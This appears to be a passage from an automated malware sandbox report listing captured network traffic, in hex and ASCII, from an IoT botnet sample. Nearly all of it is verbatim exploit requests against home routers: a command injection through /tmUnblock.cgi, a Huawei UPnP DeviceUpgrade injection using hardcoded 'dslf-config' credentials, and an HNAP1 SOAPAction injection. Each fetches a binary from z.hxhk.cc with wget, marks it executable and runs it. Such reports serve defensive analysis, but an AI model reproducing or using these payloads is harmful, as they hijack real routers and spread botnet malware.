68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 7a 2e 68 78 68 6b 2e 63 63 20 2d 6c 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 2d 72 20 73 79 73 36 34 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 73 79 73 36 34 3b 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 68 75 77 2e 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g z.hxhk.cc -l /tmp/.sys64 -r sys64.mips; /bin/busybox chmod 777 * /tmp/.sys64; /tmp/.sys64 huw.s)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 7a 2e 68 78 68 6b 2e 63 63 20 2d 6c 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 2d 72 20 73 79 73 36 34 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 73 79 73 36 34 3b 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 68 75 77 2e 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g z.hxhk.cc -l /tmp/.sys64 -r sys64.mips; /bin/busybox chmod 777 * /tmp/.sys64; /tmp/.sys64 huw.s)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 7a 2e 68 78 68 6b 2e 63 63 20 2d 6c 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 2d 72 20 73 79 73 36 34 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 73 79 73 36 34 3b 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 68 75 77 2e 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g z.hxhk.cc -l /tmp/.sys64 -r sys64.mips; /bin/busybox chmod 777 * /tmp/.sys64; /tmp/.sys64 huw.s)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 7a 2e 68 78 68 6b 2e 63 63 20 2d 6c 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 2d 72 20 73 79 73 36 34 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 73 79 73 36 34 3b 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 68 75 77 2e 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g z.hxhk.cc -l /tmp/.sys64 -r sys64.mips; /bin/busybox chmod 777 * /tmp/.sys64; /tmp/.sys64 huw.s)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 7a 2e 68 78 68 6b 2e 63 63 20 2d 6c 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 2d 72 20 73 79 73 36 34 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 73 79 73 36 34 3b 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 68 75 77 2e 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g z.hxhk.cc -l /tmp/.sys64 -r sys64.mips; /bin/busybox chmod 777 * /tmp/.sys64; /tmp/.sys64 huw.s)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 7a 2e 68 78 68 6b 2e 63 63 20 2d 6c 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 2d 72 20 73 79 73 36 34 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 73 79 73 36 34 3b 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 68 75 77 2e 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g z.hxhk.cc -l /tmp/.sys64 -r sys64.mips; /bin/busybox chmod 777 * /tmp/.sys64; /tmp/.sys64 huw.s)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
